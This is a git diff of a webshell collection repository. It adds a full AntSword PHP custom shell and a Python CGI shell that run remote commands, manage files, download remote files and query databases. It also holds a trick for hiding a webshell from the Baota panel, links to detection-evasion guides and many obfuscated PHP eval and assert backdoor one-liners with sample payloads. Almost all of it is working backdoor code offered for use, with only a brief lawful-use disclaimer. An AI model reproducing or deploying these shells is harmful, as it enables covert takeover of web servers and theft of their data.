* 使用说明:
* 1. AntSword >= v2.0.7
* 2. 创建 Shell 时选择 custom 模式连接
* 3. 数据库连接:
* <H>localhost</H>
* <U>root</U>
* <P>123456</P>
*
* 4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
*
* ChangeLog:
* Date: 2020/03/26 v1.4
* 1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
* 2. 增加动态修改字符编码接口
*
* Date: 2019/05/22 v1.3
* 1. 支持 mysqli 连接非默认端口
*
* Date: 2019/04/05 v1.2
* 1. 新增 listcmd 接口
* 2. 新增数据库支持函数检查接口
*
* Date: 2016/05/13 v1.1
* 1. 执行 DML 语句,显示执行状态
*
* Date: 2016/04/06 v1.0
* 1. 文件系统 和 terminal 管理
* 2. mysql 数据库支持
* 3. 支持 base64 和 hex 编码
**/
$pwd = "ant"; //连接密码
//数据编码 3 选 1
$encoder = ""; // default
// $encoder = "base64"; //base64
// $encoder = "hex"; // hex
//$cs = "UTF-8";
$cs=isset($_REQUEST['charset'])?$_REQUEST['charset']:"UTF-8";
/**
* 字符编码处理
**/
function EC($s){
global $cs;
$sencode = mb_detect_encoding($s, array("ASCII","UTF-8","GB2312","GBK",'BIG5'));
$ret = "";
try {
$ret = mb_convert_encoding($s, $cs, $sencode);
} catch (Exception $e) {
try {
$ret = iconv($sencode, $cs, $s);
} catch (Exception $e) {
$ret = $s;
}
}
return $ret;
}
/*传输解码*/
function decode($s){
global $encoder;
$ret = "";
switch ($encoder) {
case 'base64':
$ret = base64_decode($s);
break;
case 'hex':
for ($i=0; $i < strlen($s)-1; $i+=2) {
$output = substr($s, $i, 2);
$decimal = intval($output, 16);
$ret .= chr($decimal);
}
break;
default:
$ret = $s;
break;
}
return $ret;
}
function showDatabases($encode, $conf){
$sql = "show databases";
$columnsep = "\t";
$rowsep = "";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
}
function showTables($encode, $conf, $dbname){
$sql = "show tables from ".$dbname; // mysql
$columnsep = "\t";
$rowsep = "";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
}
function showColumns($encode, $conf, $dbname, $table){
$columnsep = "\t";
$rowsep = "";
$sql = "select * from ".$dbname.".".$table." limit 0,0"; // mysql
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
}
function query($encode, $conf, $sql){
$columnsep = "\t|\t"; // general
$rowsep = "\r\n";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
}
function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){
$ret = "";
$m=get_magic_quotes_gpc();
if ($m) {
$conf = stripslashes($conf);
}
$conf = (EC($conf));
/*
<H>localhost</H>
<U>root</U>
<P>root</P>
*/
$host="";
$user="";
$password="";
if (preg_match('/<H>(.+?)<\/H>/i', $conf, $data)) {
$host = $data[1];
}
if (preg_match('/<U>(.+?)<\/U>/i', $conf, $data)) {
$user = $data[1];
}
if (preg_match('/<P>(.+?)<\/P>/i', $conf, $data)) {
$password = $data[1];
}
$encode = decode(EC($encode));
$port=split(":",$host)[1];
$host=split(":",$host)[0];
$conn = @mysqli_connect($host, $user, $password, "", $port);
$res = @mysqli_query($conn, $sql);
if (is_bool($res)) {
return "Status".$columnsep.$rowsep.($res?"True":"False").$columnsep.$rowsep;
}
$i=0;
if ($needcoluname) {
while ($col=@mysqli_fetch_field($res)) {
$ret .= $col->name.$columnsep;
$i++;
}
$ret .= $rowsep;
}
while($rs=@mysqli_fetch_row($res)){
for($c = 0; $c <= $i; $c++){
$ret .= trim($rs[$c]).$columnsep;
}
$ret.=$rowsep;
}
return $ret;
}
function BaseInfo(){
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D==""){
$D=dirname($_SERVER["PATH_TRANSLATED"]);
}
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}else{
$R.="/";
}
$R.="\t";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="\t{$s}";
return $R;
}
function FileTreeCode($D){
$ret = "";
$F=@opendir($D);
if($F==NULL){
$ret = "ERROR:// Path Not Found Or No Permission!";
}else{
$M=NULL;
$L=NULL;
while($N=@readdir($F)){
$P=$D."/".$N;
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R="\t".$T."\t".@filesize($P)."\t".$E."\n";
if(@is_dir($P))
$M.=$N."/".$R;
else
$L.=$N.$R;
}
$ret .= $M.$L;
@closedir($F);
}
return $ret;
}
function ReadFileCode($F){
$ret = "";
try {
$P = @fopen($F,"r");
$ret = (@fread($P,filesize($F)));
@fclose($P);
} catch (Exception $e) {
$ret = "ERROR://".$e;
}
return $ret;
}
function WriteFileCode($path, $content){
return @fwrite(fopen(($path),"w"),($content))?"1":"0";
}
function DeleteFileOrDirCode($fileOrDirPath){
function df($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
if((is_dir($pf))&&($f!=".")&&($f!="..")){
@chmod($pf,0777);
df($pf);
}
if(is_file($pf)){
@chmod($pf,0777);
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
$F=(get_magic_quotes_gpc()?stripslashes($fileOrDirPath):$fileOrDirPath);
if(is_dir($F)){
return (df($F));
}
else{
return (file_exists($F)?@unlink($F)?"1":"0":"0");
}
}
function DownloadFileCode($filePath){
$F=(get_magic_quotes_gpc()?stripslashes($filePath):$filePath);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else{
echo("ERROR:// Can Not Read");
}
}
function UploadFileCode($path, $content){
$f=$path;
$c=$content;
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
return (@fwrite(fopen($f,"a"),$buf)?"1":"0");
}
function CopyFileOrDirCode($path, $content){
$m=get_magic_quotes_gpc();
$fc=($m?stripslashes($path):$path);
$fp=($m?stripslashes($content):$content);
function xcopy($src,$dest){
if(is_file($src)){
if(!copy($src,$dest))
return false;
else
return true;
}
$m=@dir($src);
if(!is_dir($dest))
if(!@mkdir($dest))
return false;
while($f=$m->read()){
$isrc=$src.chr(47).$f;
$idest=$dest.chr(47).$f;
if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){
if(!xcopy($isrc,$idest))return false;
}else if(is_file($isrc)){
if(!copy($isrc,$idest))
return false;
}
}
return true;
}
return (xcopy($fc,$fp)?"1":"0");
}
function RenameFileOrDirCode($oldName, $newName){
$m=get_magic_quotes_gpc();
$src=(m?stripslashes($oldName):$oldName);
$dst=(m?stripslashes($newName):$newName);
return (rename($src,$dst)?"1":"0");
}
function CreateDirCode($name){
$m=get_magic_quotes_gpc();
$f=($m?stripslashes($name):$name);
return (mkdir($f)?"1":"0");
}
function ModifyFileOrDirTimeCode($fileOrDirPath, $newTime){
$m=get_magic_quotes_gpc();
$FN=(m?stripslashes($fileOrDirPath):$fileOrDirPath);
$TM=strtotime((m?stripslashes($newTime):$newTime));
if(file_exists($FN)){
return (@touch($FN,$TM,$TM)?"1":"0");
}else{
return ("0");
}
}
function WgetCode($urlPath, $savePath){
$fR=$urlPath;
$fL=$savePath;
$F=@fopen($fR,chr(114));
$L=@fopen($fL,chr(119));
if($F && $L){
while(!feof($F))
@fwrite($L,@fgetc($F));
@fclose($F);
@fclose($L);
return "1";
}else{
return "0";
}
}
function ExecuteCommandCode($cmdPath, $command){
$p=$cmdPath;
$s=$command;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
return ($ret!=0)?"ret={$ret}":"";
}
function probedb(){
$ret="";
$m=array(
'mysql_close','mysqli_close','mssql_close','sqlsrv_close','ora_close','oci_close',
'ifx_close','sqlite_close','pg_close','dba_close','dbmclose','filepro_fieldcount',
'sybase_close'
);
foreach ($m as $f) {
$ret.=($f."\t".(function_exists($f)?'1':'0')."\n");
}
if(function_exists('pdo_drivers')){
foreach(@pdo_drivers() as $f){
$ret.=("pdo_".$f."\t1\n");
}
}
return $ret;
}
function listcmd($binarr){
$ret="";
$arr=@explode(",", $binarr);
foreach($arr as $v){
$ret.=($v."\t".(@file_exists($v)?"1":"0")."\n");
}
return $ret;
}
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$funccode = EC($_REQUEST[$pwd]);
$z0 = EC(decode($_REQUEST['z0']));
$z1 = EC(decode($_REQUEST['z1']));
$z2 = EC(decode($_REQUEST['z2']));
$z3 = EC(decode($_REQUEST['z3']));
// echo "<meta HTTP-EQUIV=\"csontent-type\" content=\"text/html; charset={$cs}\">";
echo "->"."|";
$ret = "";
try {
switch ($funccode) {
case 'A':
$ret = BaseInfo();
break;
case 'B':
$ret = FileTreeCode($z1);
break;
case 'C':
$ret = ReadFileCode($z1);
break;
case 'D':
$ret = WriteFileCode($z1, $z2);
break;
case 'E':
$ret = DeleteFileOrDirCode($z1);
break;
case 'F':
DownloadFileCode($z1);
break;
case 'U':
$ret = UploadFileCode($z1, $z2);
break;
case 'H':
$ret = CopyFileOrDirCode($z1, $z2);
break;
case 'I':
$ret = RenameFileOrDirCode($z1, $z2);
break;
case 'J':
$ret = CreateDirCode($z1);
break;
case 'K':
$ret = ModifyFileOrDirTimeCode($z1, $z2);
break;
case 'L':
$ret = WgetCode($z1, $z2);
break;
case 'M':
$ret = ExecuteCommandCode($z1, $z2);
break;
case 'N':
$ret = showDatabases($z0, $z1);
break;
case 'O':
$ret = showTables($z0, $z1, $z2);
break;
case 'P':
$ret = showColumns($z0, $z1, $z2, $z3);
break;
case 'Q':
$ret = query($z0, $z1, $z2);
break;
case 'Y':
$ret = listcmd($z1);
break;
case 'Z':
$ret = probedb();
break;
default:
// $ret = "Wrong Password";
break;
}
} catch (Exception $e) {
$ret = "ERROR://".$e;
}
echo $ret;
echo "|"."<-";
?>

349
antSword-shells/python2_custom_script.py Normal file
View File

@@ -0,0 +1,349 @@
#!/usr/bin/env python
# coding:utf-8
from __future__ import print_function
import os
import cgi
import time
import stat
import getpass
import base64
import binascii
import shutil
import urllib
import platform
import cgitb
import sys
cgitb.enable()
reload(sys)
sys.setdefaultencoding('utf-8')
VERSION = "0.0.2"
u'''
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
—————————————————————————————————————————————————
AntSword Python2 CGI Custom Script No DataBase
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
—————————————————————————————————————————————————
使用说明:
1. AntSword >= v1.1-dev, Python == 2.x
2. 创建 Shell 时选择 custom 模式连接
3. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
4. 本脚本不含数据库管理操作
使用方法:
1. 修改 PWD, ENCODER, ENCODE
2. 复制本脚本到 cgi-bin 目录下(根据中间件配置来定)
3. 赋予可执行权限 chmod +x xxx.py
CHANGELOG:
Date 2018/12/30 v0.0.2
1. 修复 windows 下命令执行参数问题
2. 解决 windows 下文件名中文编码问题 (win10以下系统建议使用 gb2312 gbk 编码)
3. 修复 windows 下获取当前用户获取不到时致命错误
Date 2018/12/29 v0.0.1
1. 文件系统 和 terminal 管理
2. 支持 hex 和 base64 编码器
3. 脚本内统一使用 unicode 编码来处理
'''
PWD = "ant" # 连接密码
ENCODER = "" # 编码器, 3选1
# ENCODER = "hex" # 推荐使用此编码器
# ENCODER = "base64"
ENCODE = "utf-8" # 字符编码
OUT_PREFIX = "->" + "|" # 数据分割前缀符
OUT_SUFFIX = "|" + "<-" # 数据分割后缀符
def Decoder(enstr):
u'''解码方法,解AntSword 编码器编码后的数据
@param enstr string 已经经过编码器编码的数据
@return ret string 解码后的数据
'''
if(ENCODER == "base64"):
return base64.b64decode(enstr)
elif (ENCODER == "hex"):
return binascii.a2b_hex(enstr)
else:
return enstr
def TimeStampToTime(timestamp):
timeStruct = time.localtime(timestamp)
return time.strftime(u'%Y-%m-%d %H:%M:%S',timeStruct)
def BaseInfo():
u'''获取系统基础信息
@return ret string Shell或网站根目录\t盘符\tuname信息\t当前用户
'''
ret = ""
d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
if(d == ""):
d = os.getcwd()
ret = "%s\t" % d
if(d.startswith('/')):
ret += "/"
else:
for L in range(ord('C'), ord('Z') + 1):
if(os.path.isdir("%s:" % chr(L))):
ret += "%s:" % chr(L)
ret += "\t"
ret += "%s\t" % ' '.join(platform.uname())
if platform.system().lower() == 'windows':
u = "Unknow" # windows 下没 pwd 使用 getpass.getuser 会出错
for name in ('LOGNAME','USER','LNAME','USERNAME'):
user = os.environ.get(name)
if user:
u = user
break
ret += u
else:
ret += getpass.getuser()
return ret
def FileTreeCode(d):
u'''获取指定目录下的文件和目录信息
@param d string 文件路径
@return ret string 文件名\t创建时间\t文件大小\t文件权限(RWX 或 8进制)
'''
ret = u""
# 如果文件名/目录是中文,则需要 encode 成系统的编码后再去处理
if(os.path.exists(d.encode(ENCODE))):
for fname in os.listdir(d.encode(ENCODE)):
fname = fname.decode(ENCODE)
p = os.path.join(d, fname)
try:
fst = os.stat(p.encode(ENCODE))
name = fname
if stat.S_ISDIR(fst.st_mode):
name += "/"
ret += u"{}\t{}\t{}\t{}\n".format(name, TimeStampToTime(fst.st_mtime), fst.st_size, oct(fst.st_mode)[-4:])
except:
ret += u"{}\t{}\t{}\t{}\n".format(fname, TimeStampToTime(0), 0, 0)
else:
ret = "ERROR:// Path Not Found or No Permission!"
return ret.encode(ENCODE)
def ReadFileCode(fpath):
u'''获取指定路径文件内容
@param fpath string 文件路径
@return ret string 成功返回文件内容,失败抛出异常
'''
with open(fpath.encode(ENCODE), 'r') as fp:
return fp.read()
def WriteFileCode(path, content):
u'''向指定文件路径下写入content的内容
@param path string 文件路径
@param content string 文件内容(整个文件内容)
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
with open(path.encode(ENCODE), "w") as fp:
fp.write(content.encode(ENCODE))
return "1"
def DeleteFileOrDirCode(path):
u'''删除指定路径下的文件或目录
@param path string 文件或目录路径
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
if os.path.isdir(path.encode(ENCODE)):
shutil.rmtree(path.encode(ENCODE))
else:
os.remove(path.encode(ENCODE))
return "1"
def DownloadFileCode(path):
u'''下载指定路径的文件
@param path string 文件路径
@return None 直接在本方法内输出文件的二进制内容,失败则抛出异常
'''
with open(path.encode(ENCODE), 'r') as fp:
print(fp.read(),end='')
def UploadFileCode(path, content):
u'''上传文件
@param path string 文件路径 eg: /tmp/123
@param content hexstring 文件内容(分段) eg: 416e74 内容为 Ant
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
data = binascii.a2b_hex(content)
with open(path.encode(ENCODE), "a") as f:
f.write(data)
return "1"
def CopyFileOrDirCode(oldPath, newPath):
u'''复制文件或目录
@param oldPath string 原文件/目录路径 eg: /etc/passwd
@param newPath string 新文件/目录路径 eg: /tmp/passwd
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
if os.path.isdir(oldPath.encode(ENCODE)):
shutil.copytree(oldPath.encode(ENCODE), newPath.encode(ENCODE),symlinks=True)
else:
shutil.copy(oldPath.encode(ENCODE), newPath.encode(ENCODE))
return "1"
def RenameFileOrDirCode(oldPath, newPath):
u'''重命名文件或目录
@param oldPath string 原文件/目录路径 eg: /tmp/123
@param newPath string 新文件/目录路径 eg: /tmp/456
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
os.rename(oldPath.encode(ENCODE), newPath.encode(ENCODE))
return "1"
def CreateDirCode(path):
u'''新建目录
@param path string 新目录路径 eg: /tmp/123
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
os.makedirs(path.encode(ENCODE))
return "1"
def ModifyFileOrDirTimeCode(path, newTime):
u'''修改文件或目录的 最后一次修改时间
@param path string 文件/目录路径 eg: /tmp/123
@param newTime string 时间字符串 eg: 2018-12-12 20:48:54
@return ret string 成功返回 1 失败返回 0
'''
atime = int(time.mktime(time.strptime(newTime, '%Y-%m-%d %H:%M:%S')))
os.utime(path.encode(ENCODE), (atime, atime))
return "1"
def WgetCode(url, savepath):
u'''服务端 Wget
@param url string url 地址 eg: http://xxx.com/1.jpg
@param savepath string 文件路径 eg: /tmp/2.jpg
@return ret string 成功返回 1 失败返回 0
'''
urllib.urlretrieve(url, filename=savepath.encode(ENCODE))
return "1"
def ExecuteCommandCode(cmdPath, command):
u'''执行命令
@param cmdPath string 执行命令的shell路径 eg: /bin/sh
@param command string 执行的命令内容 eg: cd "/usr/";pwd;whoami
@return ret string 执行命令返回结果
'''
d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
if(d == ""):
d = os.getcwd()
cmd = []
if d[0] == "/":
cmd = [cmdPath, '-c', '%s' % command]
else:
cmd = '''%s /c "%s"''' % (cmdPath, command)
c_stdin, c_stdout, c_stderr = os.popen3(cmd)
c_stdin.close()
result = c_stdout.read()
c_stdout.close()
errmsg = c_stderr.read()
c_stderr.close()
return result + errmsg
def showDatabases(encode, conf):
u'''列出当前数据库系统下所有数据库
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@return ret string 执行结果, \t 为字段分割符
例如某连接下有3个数据库(mysql,test,information_schema),
则返回结果为:
mysql\ttest\tinformation_schema
'''
return "ERROR:// Not Implement"
def showTables(encode, conf, dbname):
u'''列出当前数据库下所有表
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@return ret string 执行结果, \t 为字段分割符
例如某数据库下有3张表(user,admin,member),则返回结果为:
user\tadmin\tmember
'''
return "ERROR:// Not Implement"
def showColumns(encode, conf, dbname, table):
u'''列出当前表下所有列
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@param table string 表名 eg: user
@return ret string 执行结果, \t 为字段分割符
例如某张表有3个字段(id,user,password), 则返回数据如下:
id\tuser\tpassword
'''
return "ERROR:// Not Implement"
def query(encode, conf, sql):
u'''执行 sql 语句
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param sql string 要执行的sql语句
@return ret string 执行结果, \t|\t 为列分割符, \r\n为行分割符, 第一行为列名
例如某张表有3个字段(id,user,password), 查询的结果有2条数据,则返回数据如下:
id\t|\tuser\t|\tpassword\r\n1\t|\tadmin\t|\t123456\r\n2\t|\tuser\t|\t123456\r\n
'''
return "ERROR:// Not Implement"
if __name__ == "__main__":
print("Content-Type: text/html;charset=%s" % ENCODE)
print()
print(OUT_PREFIX.decode(ENCODE), end='')
ret = ""
try:
form = cgi.FieldStorage()
funcode = form.getvalue(PWD)
z0 = Decoder(form.getvalue("z0","").decode())
z1 = Decoder(form.getvalue("z1","").decode())
z2 = Decoder(form.getvalue("z2","").decode())
z3 = Decoder(form.getvalue("z3","").decode())
if(funcode == "A"):
ret = BaseInfo()
elif(funcode == "B"):
ret = FileTreeCode(z1)
elif(funcode == 'C'):
ret = ReadFileCode(z1)
elif(funcode == 'D'):
ret = WriteFileCode(z1, z2)
elif(funcode == 'E'):
ret = DeleteFileOrDirCode(z1)
elif(funcode == 'F'):
DownloadFileCode(z1)
elif(funcode == 'U'):
ret = UploadFileCode(z1, z2)
elif(funcode == 'H'):
ret = CopyFileOrDirCode(z1, z2)
elif(funcode == 'I'):
ret = RenameFileOrDirCode(z1, z2)
elif(funcode == 'J'):
ret = CreateDirCode(z1)
elif(funcode == 'K'):
ret = ModifyFileOrDirTimeCode(z1, z2)
elif(funcode == 'L'):
ret = WgetCode(z1, z2)
elif(funcode == 'M'):
ret = ExecuteCommandCode(z1, z2)
elif(funcode == 'N'):
ret = showDatabases(z0, z1)
elif(funcode == 'O'):
ret = showTables(z0, z1, z2)
elif(funcode == 'P'):
ret = showColumns(z0, z1, z2, z3)
elif(funcode == 'Q'):
ret = query(z0, z1, z2)
else:
pass
except Exception, e:
ret = "ERROR:// %s" % getattr(e, 'strerror', str(e))
print(ret, end="")
print(OUT_SUFFIX.decode(ENCODE))

2
asp/webshell.asp
View File

@@ -39,7 +39,7 @@ end Function
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)

1
backlion/webshell Submodule

Submodule backlion/webshell added at 4ced903c80

1
bartblaze/PHP-backdoors Submodule

Submodule bartblaze/PHP-backdoors added at b15017f9c5

18
bt_yincang_shell.md Normal file
View File

@@ -0,0 +1,18 @@
bt 面板隐藏webshell小技巧
最近宝塔的phpmyadmin大家应该都已经知道了。我就不炒冷饭最近也没有研究什么比较有含量的就分享一个宝塔面板隐藏webshell的小技巧比较水。
创建一个文件名为```.<a.php```的文件
![image](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8xjy4y3M4s8KQnT5tBHFiaO2p0AolDy0HBDsbBGZ3mcOeHicoyMic2bvIg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
解压出来以后,宝塔的文件管理面板中是不会出现的
![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8ibRCosCwfqfehHput38DJicXQiaeLiaT2SIZFiaOribt3udemBmzK8glHiaicg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
但是文件是存在的
而且可以正常访问
![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8bDBrx4LOThfraAEQk7ribZibyKuUrdeC8GpWeibHXsmyGRb9zA6NzpoUg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)

2
bypass.md Normal file
View File

@@ -0,0 +1,2 @@
### 1. [一个经典的过人 WebShell by tr0y](https://www.tr0y.wang/2020/07/14/webshell-bypass-human/)
### 2. [WebShell免杀 by 4hou.win](https://4hou.win/wordpress/?p=47975)

BIN
content/1个经典的过人 WebShell.pdf Normal file
View File

Binary file not shown.

BIN
content/Upload与WAF的那些事.pdf Normal file
View File

Binary file not shown.

BIN
content/WebShell免杀.pdf Normal file
View File

Binary file not shown.

79624
content/Webshell免杀的思考与学习 - 先知社区.mhtml Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
content/php马-bypass _ alin'Blog.pdf Normal file
View File

Binary file not shown.

1
content/readme.md Normal file
View File

@@ -0,0 +1 @@
### 故名思意,收集一些方法技术pdf存档查看

3
content/webshell-detect-bypass Normal file
View File

@@ -0,0 +1,3 @@
share project bypass waf
https://github.com/LandGrey/webshell-detect-bypass

BIN
content/从Webshell的视角谈攻防对抗 - FreeBuf网络安全行业门户.pdf Normal file
View File

Binary file not shown.

BIN
content/冰蝎,从入门到魔改.pdf Normal file
View File

Binary file not shown.

BIN
content/冰蝎,从入门到魔改(续).pdf Normal file
View File

Binary file not shown.

1
docs/CNAME
View File

@@ -1 +0,0 @@
shell.endp.top

1
lcatro/PHP-WebShell-Bypass-WAF Submodule

Submodule lcatro/PHP-WebShell-Bypass-WAF added at 672f2ceb7d

1
lhlsec/webshell Submodule

Submodule lhlsec/webshell added at 4669c5f8e3

1
malwares/WebShell Submodule

Submodule malwares/WebShell added at 2c064553f7

1
oneoneplus/webshell Submodule

Submodule oneoneplus/webshell added at 6f030b91c1

20
other shell repository
View File

@@ -1,20 +0,0 @@
add other webshell collect repository
url : https://github.com/tdifg/WebShell
add public-shell repository
url : https://github.com/BDLeet/public-shell
add web-backdoors
url : https://github.com/all3g/fuzzdb/tree/master/web-backdoors
add web-shell
url : https://github.com/BlackArch/webshells
add webshellSample
url : https://github.com/tanjiti/webshellSample
add Ridter'Pentest backdoor tools
url : https://github.com/Ridter/Pentest/tree/master/backdoor
add xl7dev'WebShell
https://github.com/xl7dev/WebShell 小乐天 From: Knownsec

27
other shell repository.md Normal file
View File

@@ -0,0 +1,27 @@
add other webshell collect repository
url : [https://github.com/tdifg/WebShell](https://github.com/tdifg/WebShell)
add public-shell repository
url : [https://github.com/BDLeet/public-shell](https://github.com/BDLeet/public-shell)
add web-backdoors
url : [https://github.com/all3g/fuzzdb/tree/master/web-backdoors](https://github.com/all3g/fuzzdb/tree/master/web-backdoors)
add web-shell
url : [https://github.com/BlackArch/webshells](https://github.com/BlackArch/webshells
add webshellSample
url : [https://github.com/tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
add Ridter'Pentest backdoor tools
url : [https://github.com/Ridter/Pentest/tree/master/backdoor](https://github.com/Ridter/Pentest/tree/master/backdoor)
add xl7dev'WebShell
url : [https://github.com/xl7dev/WebShell](https://github.com/xl7dev/WebShell) 小乐天 From: Knownsec

1
php/2020-08-31-01.php Normal file
View File

@@ -0,0 +1 @@
<?php $a="~+d()"^"!{+{}";$b=${$a}["a"];eval("".$b);?>

4
php/2020.08.20.01.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = substr('1a',1).'s'.'s'.'e'.'r'.'t';
$a($_POST['x']);
?>

4
php/2020.08.20.02.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = strtr('azxcvt','zxcv','sser');
$a($_POST['x']);
?>

4
php/2020.08.20.03.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = substr_replace("asxxx","sert",2);
$a($_POST['x']);
?>

4
php/2020.08.20.04.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = trim(' assert ');
$a($_POST['x']);
?>

7
php/2020.08.20.05.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>

6
php/2020.08.20.06.php Normal file
View File

@@ -0,0 +1,6 @@
<?php
function sqlsec($a){
assert($a);
}
sqlsec($_POST['x']);
?>

3
php/2020.08.20.07.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
call_user_func('assert',$_POST['x']);
?>

3
php/2020.08.20.08.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
call_user_func_array(assert,array($_POST['x']));
?>

3
php/2020.08.20.09.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
array_filter(array($_POST['x']),'assert');
?>

5
php/2020.08.20.10.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>

5
php/2020.08.20.11.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);
?>

9
php/2020.08.20.12.php Normal file
View File

@@ -0,0 +1,9 @@
<?php
function sqlsec($value,$key)
{
$x = $key.$value;
$x($_POST['x']);
}
$a=array("ass"=>"ert");
array_walk($a,"sqlsec");
?>

5
php/2020.08.20.13.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x'] => '|.*|e',);
array_walk($arr, $e, '');
?>

28
php/2020.08.20.14.php Normal file
View File

@@ -0,0 +1,28 @@
<?php
mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
?>
<?php
preg_filter('|\d|e', $_REQUEST['x'], '2');
?>
use like:
```
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x'] => '|.*|e',);
array_walk($arr, $e, '');
?>
此时提交如下 payload 的话:
Php
shell.php?e=preg_replace
最后就相当于执行了如下语句:
Php
preg_replace('|.*|e',$_POST['x'],'')
这个时候只需要 POST x=phpinfo();
```

3
php/2020.08.20.15.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>

5
php/2020.08.20.16.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>

62
php/2020.08.20.17.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['x']);
?>
post: e=assert&x=phpinfo();
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
?>
post: e=assert&x=phpinfo();
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['x']);
uasort($arr, base64_decode($e));
?>
post: e=YXNzZXJ0&x=phpinfo();
<?php
$arr = new ArrayObject(array('test', $_REQUEST['x']));
$arr->uasort('assert');
?>
<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['x'] => 2);
uksort($arr, $e);
?>
post: e=assert&x=phpinfo();
<?php
$arr = new ArrayObject(array('test' => 1, $_REQUEST['x'] => 2));
$arr->uksort('assert');
?>
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['x']);
?>
<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['x']);
?>
<?php
